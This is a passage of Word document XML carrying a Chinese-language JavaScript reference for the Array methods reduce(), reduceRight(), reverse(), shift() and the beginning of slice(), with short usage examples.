      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>时的返回值。</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reduce()</w:t>
      </w:r>
      <w:r>
        <w:t>方法接受函数</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>作为第一个参数。该函数的行为应该像一个二元操作符一样：接受两个值，执行某些操作，然后返回结果。如果</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>有</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>个元素，</w:t>
      </w:r>
      <w:r>
        <w:t>reduce()</w:t>
      </w:r>
      <w:r>
        <w:t>方法会调用</w:t>
      </w:r>
      <w:r>
        <w:t>n-1</w:t>
      </w:r>
      <w:r>
        <w:t>次来将这些元素缩减为一个合并值。（你可能已经熟悉了数组缩减操作，在其他编程语言中，有时称为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>折叠</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>注入</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>第一次调用</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>时传入的是</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>的前两个元素。接</w:t>
      </w:r>
      <w:r>
        <w:t>下来的调用会传入之前的计算值和</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>的下一个元素（按照从小到大的序号顺序）。最后一次调用</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>的返回值会成为</w:t>
      </w:r>
      <w:r>
        <w:t>reduce()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的返回值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>reduce()</w:t>
      </w:r>
      <w:r>
        <w:t>在调用时可以传入可选的第二个参数：</w:t>
      </w:r>
      <w:r>
        <w:t>initial</w:t>
      </w:r>
      <w:r>
        <w:t>。如果指定</w:t>
      </w:r>
      <w:r>
        <w:t>initial</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>reduce()</w:t>
      </w:r>
      <w:r>
        <w:t>的行为会像是把该参数插入</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>的头部一样（注意，实际上并没有修改</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>）。换一种说法是，就像</w:t>
      </w:r>
      <w:r>
        <w:t>reduce()</w:t>
      </w:r>
      <w:r>
        <w:t>带有两个参数调用，而</w:t>
      </w:r>
      <w:r>
        <w:t>initial</w:t>
      </w:r>
      <w:r>
        <w:t>就像是之前</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>的返回值一样。这种情况下，第一次调用</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>时传入的是</w:t>
      </w:r>
      <w:r>
        <w:t>initial</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>的第一个元素。当指定</w:t>
      </w:r>
      <w:r>
        <w:t>initi</w:t>
      </w:r>
      <w:r>
        <w:t>al</w:t>
      </w:r>
      <w:r>
        <w:t>时，要缩减的元素有</w:t>
      </w:r>
      <w:r>
        <w:t>n+1</w:t>
      </w:r>
      <w:r>
        <w:t>个（</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>个元素，加上</w:t>
      </w:r>
      <w:r>
        <w:t>initial</w:t>
      </w:r>
      <w:r>
        <w:t>值），则调用</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>次</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>为空，又没有指定</w:t>
      </w:r>
      <w:r>
        <w:t>initial</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>reduce()</w:t>
      </w:r>
      <w:r>
        <w:t>会抛出</w:t>
      </w:r>
      <w:r>
        <w:t>TypeError</w:t>
      </w:r>
      <w:r>
        <w:t>异常。如果</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>为空，但指定</w:t>
      </w:r>
      <w:r>
        <w:t>initial</w:t>
      </w:r>
      <w:r>
        <w:t>，则</w:t>
      </w:r>
      <w:r>
        <w:t>reduce()</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>initial</w:t>
      </w:r>
      <w:r>
        <w:t>，且永远不调用</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>。如果</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>只有一个元素，且没有指定</w:t>
      </w:r>
      <w:r>
        <w:t>initial</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>reduce()</w:t>
      </w:r>
      <w:r>
        <w:t>不调用</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>，会返回</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>的单个元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>上面的段落描述了</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>的两个参数，实际上</w:t>
      </w:r>
      <w:r>
        <w:t>reduce()</w:t>
      </w:r>
      <w:r>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>时传入了</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个参数。第三个参数是第二个参数的数组序号。第</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个参数</w:t>
      </w:r>
      <w:r>
        <w:t>则是</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>自身。</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>永远当做函数调用，而不是方法。</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[1,2,3,4].reduce(function(x,y){return x*y;})//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>24:((1*2)*3)*4</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Array.forEach()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Array.map()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Array.reduceRight()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="590" w:name="Array_reduceRight__"/>
      <w:r>
        <w:t>Array.reduceRight()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="590"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>从右到左缩减数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>array.reduceRight(f)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>array.reduceRight(f,initial)</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f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个函数，可以合并两</w:t>
      </w:r>
      <w:r>
        <w:t>个值（比如两个数组元素），并返回一个</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>缩减</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的新值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>initial</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>用来缩减数组的可选初始值。如果指定该参数，</w:t>
      </w:r>
      <w:r>
        <w:t>reduceRight()</w:t>
      </w:r>
      <w:r>
        <w:t>的行为会像是把该参数插入</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>的尾部一样。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>数组的缩减值，该值是最后一次调用</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>时的返回值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>reduceRight()</w:t>
      </w:r>
      <w:r>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:t>reduce()</w:t>
      </w:r>
      <w:r>
        <w:t>方法一样：调用</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>函数</w:t>
      </w:r>
      <w:r>
        <w:t>n-1</w:t>
      </w:r>
      <w:r>
        <w:t>次，来将</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>个元素缩减为单个值。</w:t>
      </w:r>
      <w:r>
        <w:t>reduceRight()</w:t>
      </w:r>
      <w:r>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:t>reduce()</w:t>
      </w:r>
      <w:r>
        <w:t>只有一点不同：遍历数组时是从右到左（从最大的序号到最小的），而不是从左到右。细节请参考</w:t>
      </w:r>
      <w:r>
        <w:t>Array.reduce()</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[2,10,60].reduceRight(function(x,y){return x/y;})//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>3:(60/10)/2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pP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Array.reduce()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="591" w:name="Array_reverse__"/>
      <w:r>
        <w:t>Array.reverse()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="591"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>颠倒数组中的元素顺序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>array.reverse()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Array</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>reverse()</w:t>
      </w:r>
      <w:r>
        <w:t>方法可以颠倒数组元素的顺序。它会在原数组中进行操作：重新调整</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>中的元素，而不会创建一个新数组。如果</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>有多个引用，该数组元素的新顺序在所有引用中可见。</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a=new Array(1,2,3);//a[0]==1,a[2]==3;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.reverse();//</w:t>
      </w:r>
      <w:r>
        <w:t>现在</w:t>
      </w:r>
      <w:r>
        <w:t>a[0]==3,a[2]==1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="592" w:name="Array_shift__"/>
      <w:r>
        <w:t>Array.shift()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="592"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>移除数组的第一个元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>array.shift()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>数组原来的第一个元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>shift()</w:t>
      </w:r>
      <w:r>
        <w:t>会移除并返回</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>的第一个元素，并将所有后续元素前移一位，以填补数组头部的空缺。如果数组为空，</w:t>
      </w:r>
      <w:r>
        <w:t>shift()</w:t>
      </w:r>
      <w:r>
        <w:t>什么也不干，直接返回</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>值。注意</w:t>
      </w:r>
      <w:r>
        <w:t>shift()</w:t>
      </w:r>
      <w:r>
        <w:t>没有创建新数组，它会直接修改</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>shift()</w:t>
      </w:r>
      <w:r>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:t>Array.pop()</w:t>
      </w:r>
      <w:r>
        <w:t>类似，除了操作的是数组的头部而不是尾部。</w:t>
      </w:r>
      <w:r>
        <w:t>shift()</w:t>
      </w:r>
      <w:r>
        <w:t>经常与</w:t>
      </w:r>
      <w:r>
        <w:t>unshift()</w:t>
      </w:r>
      <w:r>
        <w:t>一起使用。</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a=[1,[2,3],4];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.shift();//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>1;a=[[2,3],4]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.shift();//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>[2,3]a=[4]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>参</w:t>
      </w:r>
      <w:r>
        <w:t>阅</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Array.pop()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Array.unshift()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="593" w:name="Array_slice__"/>
      <w:r>
        <w:t>Array.slice()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="593"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回数组的一部分</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>array.slice(start,end)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>数组片段开始处的数组序号。如果为负数，则表示从数组的尾部开始计算。也就是说，</w:t>
      </w:r>
      <w:r>
        <w:t>-1</w:t>
      </w:r>
      <w:r>
        <w:t>代表最后一个元素，</w:t>
      </w:r>
      <w:r>
        <w:t>-2</w:t>
      </w:r>
      <w:r>
        <w:t>代表倒数第二个元素，以此类推。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>end</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>数组片段结束处的后一个元素的数组序号。如果没有指定，该片段会包含从</w:t>
      </w:r>
      <w:r>
        <w:t>start</w:t>
      </w:r>
      <w:r>
        <w:t>开始到数组尾部的所有数组元素。如果为负数，则表示从数组的尾部开始计算。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>返回值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个新数组，包含</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>中从</w:t>
      </w:r>
      <w:r>
        <w:t>star</w:t>
      </w:r>
      <w:r>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t>一直到</w:t>
      </w:r>
      <w:r>
        <w:t>end</w:t>
      </w:r>
      <w:r>
        <w:t>之间的所有元素（包含</w:t>
      </w:r>
      <w:r>
        <w:t>start</w:t>
      </w:r>
      <w:r>
        <w:t>指定的元素，但不包含</w:t>
      </w:r>
      <w:r>
        <w:t>end</w:t>
      </w:r>
      <w:r>
        <w:t>指定的元素）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>slice()</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>的片段，或称为子数组。返回的数组包含从</w:t>
      </w:r>
      <w:r>
        <w:t>start</w:t>
      </w:r>
      <w:r>
        <w:t>一直到</w:t>
      </w:r>
      <w:r>
        <w:t>end</w:t>
      </w:r>
      <w:r>
        <w:t>之间的所有元素（包含</w:t>
      </w:r>
      <w:r>
        <w:t>start</w:t>
      </w:r>
      <w:r>
        <w:t>指定的元素，但不包含</w:t>
      </w:r>
      <w:r>
        <w:t>end</w:t>
      </w:r>
      <w:r>
        <w:t>指定的元素）。如果没有指定</w:t>
      </w:r>
      <w:r>
        <w:t>end</w:t>
      </w:r>
      <w:r>
        <w:t>，返回的数组包含从</w:t>
      </w:r>
      <w:r>
        <w:t>start</w:t>
      </w:r>
      <w:r>
        <w:t>到</w:t>
      </w:r>
      <w:r>
        <w:t>array</w:t>
      </w:r>
      <w:r>
        <w:t>尾部的所有元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意</w:t>
      </w:r>
      <w:r>
        <w:t>slice()</w:t>
      </w:r>
      <w:r>
